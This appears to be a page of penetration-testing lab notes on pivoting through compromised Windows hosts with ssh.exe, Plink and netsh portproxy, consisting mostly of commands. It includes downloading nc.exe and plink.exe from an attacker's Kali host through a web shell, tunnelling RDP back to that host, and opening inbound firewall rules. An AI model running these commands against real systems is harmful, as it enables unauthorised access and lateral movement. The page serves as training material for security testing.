Port Forwarding with Windows Tools

ssh.exe

# Useful when only limited port is allowed to access by AV.
# This can scan many ports at once.
# DrawBack: OpenSSH version must be >= 7.6. 

# Step 1:
# Verify if OpenSSH client is available on the Windows machine.
# Run in windows cmd
where ssh
# Example Output:
# C:\Windows\System32\OpenSSH\ssh.exe

# Step 2:
# Run in windows cmd
# Check the OpenSSH version to ensure it's >= 7.6.
ssh -V
# Example Output:
# OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2

# Step 3:
# Set up remote dynamic port forwarding with a SOCKS proxy.
# -N: Prevents the SSH session from executing remote commands (no shell).
# -R [port]: Sets up a remote port forward, binding the specified port on the SSH server.
ssh -N -R [port] user@hostname
# Example:
# ssh -N -R 9998 [email protected]

# Step 4:
# Verify if the remote dynamic port forwarding is working.
sudo ss -ntplu
# Check for port listening on the specified port.
# Example:
# tcp       LISTEN     0           128                       127.0.0.1:9998                 0.0.0.0:*

# Step 5:
# Configure proxychains to use the SOCKS proxy.
# Edit /etc/proxychains4.conf to include the SOCKS proxy.
# Check the configuration:
tail /etc/proxychains4.conf
# Example:
# socks5 127.0.0.1 9998

# Step 6:
# Run the desired command through proxychains.
proxychains psql -h <target_db_ip> -U postgres
# Example:
# proxychains psql -h 10.4.50.215 -U postgres

Plink.exe

# Useful when OpenSSH is not available on Windows, but you need to set up port forwarding.
# Plink is lightweight and command-line based, suitable for situations where GUI access is limited.

# Step 1:
# Ensure you have a reverse shell on the target machine.
# Download nc.exe and plink.exe to the target machine using a web shell.
powershell wget -Uri http://<KALI_IP>/nc.exe -OutFile C:\Windows\Temp\nc.exe
powershell wget -Uri http://<KALI_IP>/plink.exe -OutFile C:\Windows\Temp\plink.exe

# Step 2:
# Create a remote port forward using Plink to access blocked services.
# -ssh: Specifies the SSH protocol.
# -R [local_port:remote_host:remote_port]: Sets up remote port forwarding.
# -l: Specifies the SSH username.
# -pw: Provides the SSH password.
# Note: 3389 is RDP port and we are connecting to that.
# Example:
C:\Windows\Temp\plink.exe -ssh -l <username_KALI_OWB> -pw <password_KALI_OWN> -R 127.0.0.1:9833:127.0.0.1:3389 $IP_KALI

# Note:
# If you encounter prompts about the SSH client key cache and cannot respond interactively, automate confirmation with:
cmd.exe /c echo y | .\plink.exe -ssh -l <username> -pw <password> -R 127.0.0.1:9833:127.0.0.1:3389 <KALI_IP>

# Step 3:
# Verify that the port is being forwarded correctly.
ss -ntplu | grep 9833

# Step 4:
# Connect to the forwarded port with the appropriate client (e.g., xfreerdp for RDP).
xfreerdp /u:<username> /p:<password> /v:127.0.0.1:9833
# Not working then try using other port ...

Netsh

# Useful when you need to forward traffic through a specific port on a Windows machine, especially if you only have access to a limited number of ports.
# This approach is useful in scenarios where firewall rules are restrictive but you can establish an RDP session with admin privileges.

# Step 1:
# RDP into the Windows machine (MULTISERVER03) and open a command prompt with administrative privileges.

# Step 2:
# Create a port forward using Netsh:
# - Listen on port 2222 on the external-facing interface (192.168.50.64).
# - Forward packets to port 22 on PGDATABASE01 (10.4.50.215).
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.170.64 connectport=22 connectaddress=10.4.170.215

# Step 3:
# Verify the port is listening using netstat:
# IN RDP
netstat -anp TCP | find "2222"

# Step 4:
# Check existing portproxy rules:
netsh interface portproxy show all


# Step 5:
# Add a firewall rule to allow inbound traffic on port 2222:
# We are creating hole in firewall to access the port.
#IN RDP
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.170.64 localport=2222 action=allow

# If you want to check existing rule:
netsh advfirewall firewall show rule name=all | findstr "2222"
# To display all values:
netsh advfirewall firewall show rule name="port_forward_ssh_2222"


# Step 6:
# Verify the port is accessible from your machine (e.g., using Nmap):
# In Kali
sudo nmap -sS 192.168.170.64 -Pn -n -p2222

# Step 7:
# Test the connection through SSH:
ssh [email protected] -p2222


# Step 8:
# After use, remember to clean up:
# Delete the firewall rule:
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
# Delete the port forward:
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.170.64

PreviousSSH Tunneling NextTunneling Through Deep Packet Inspection

Last updated 1 year ago